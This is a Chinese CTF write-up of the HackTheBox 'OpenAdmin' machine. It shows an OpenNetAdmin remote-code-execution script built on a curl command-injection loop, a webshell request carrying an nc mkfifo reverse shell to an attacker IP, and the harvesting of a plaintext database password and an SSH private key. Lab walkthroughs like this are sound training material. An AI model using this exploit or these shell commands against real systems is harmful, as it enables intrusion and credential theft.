- 微信
- 微博
  
  分享文章到微博
- 复制链接
  
  复制链接到剪贴板

Hackthebox_OpenAdmin靶机

Khan安全团队发表于 2023/05/15 20:20:35 2023/05/15

【摘要】 Hackthebox_OpenAdmin靶机

大家好，今天给大家带来的CTF挑战靶机是来自hackthebox的“OpenAdmin”，hackthebox是一个非常不错的在线实验平台，能帮助你提升渗透测试技能和黑盒测试技能，平台上有很多靶机，从易到难，各个级别的靶机都有。本级靶机难度为简单级别，任务是找到靶机上的user.txt和root.txt。

攻略要点：

opennetadmin RCE getshell

jimmy ssh密码窃取 & joanna ssh密钥窃取

nano获得 root flag

信息收集：

nmap 扫出了 22 , 80 端口

查看80端口

用gobuster扫描目标url，并且发现了 artwork/ 和 music/

opennetadmin后台泄露 & RCE

发现 music/ 页面下的登录按钮跳转后台，用户为 guest

发现使用的是 opennetadmin 后台

使用searchsploit找到相关的RCE漏洞

[47691.sh](https://www.exploit-db.com/exploits/47691)

root@localhost:~/hackthebox_workspace/finish/Openadmin# cat pwn.sh #!/bin/bash
URL="${1}"while true;do echo -n "$ "; read cmd curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1done

Getshell：

root@localhost:~/hackthebox_workspace/finish/Openadmin# ./pwn.sh http://10.10.10.171/ona/login.php                 $ pwd                                                                                                              /opt/ona/www

jimmy 密码泄露

发现这个 shell 只能用于当前路径

传 webshell ，并生成 nc 反弹 shell

http://10.10.10.171/ona/xxx.php?0=rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/bash%20-i%202%3E%261%7Cnc%2010.10.xx.xxx%20xxxx%20%3E/tmp/f

拿到 shell 之后枚举用户

发现了 jimmy 和 joanna 用户

在 /opt/ona/www/local/config 文件夹下面找到明文密码

www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.phpcat database_settings.inc.php<?php
$ona_contexts=array (  'DEFAULT' =>   array (    'databases' =>     array (      0 =>       array (        'db_type' => 'mysqli',        'db_host' => 'localhost',        'db_login' => 'ona_sys',        'db_passwd' => 'n1nj4W4rri0R!',        'db_database' => 'ona_default',        'db_debug' => false,      ),    ),    'description' => 'Default data context',    'context_color' => '#D3DBFF',  ),);
?>

ssh尝试使用密码登录 jimmy 和 joanna

发现密码的用户为 jimmy

Joanna 密钥泄露

jimmy 没有拿 user.txt 的权限，我们需要拿下 joanna 用户，在 /var/www/ 下发现了文件夹 internal 的所有者为 joanna

internal/main.php 会输出 joanna 的 ssh 私钥

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };                    # Open Admin Trusted                                     # OpenAdmin                                              $output = shell_exec('cat /home/joanna/.ssh/id_rsa');echo "<pre>$output</pre>";                               ?>                                                       <html>                                                   <h3>Don't forget your "ninja" password</h3>Click here to logout <a href="logout.php" tite = "Logout">Session                                                  </html>

查看网络服务

发现一个奇怪的服务端口为 52846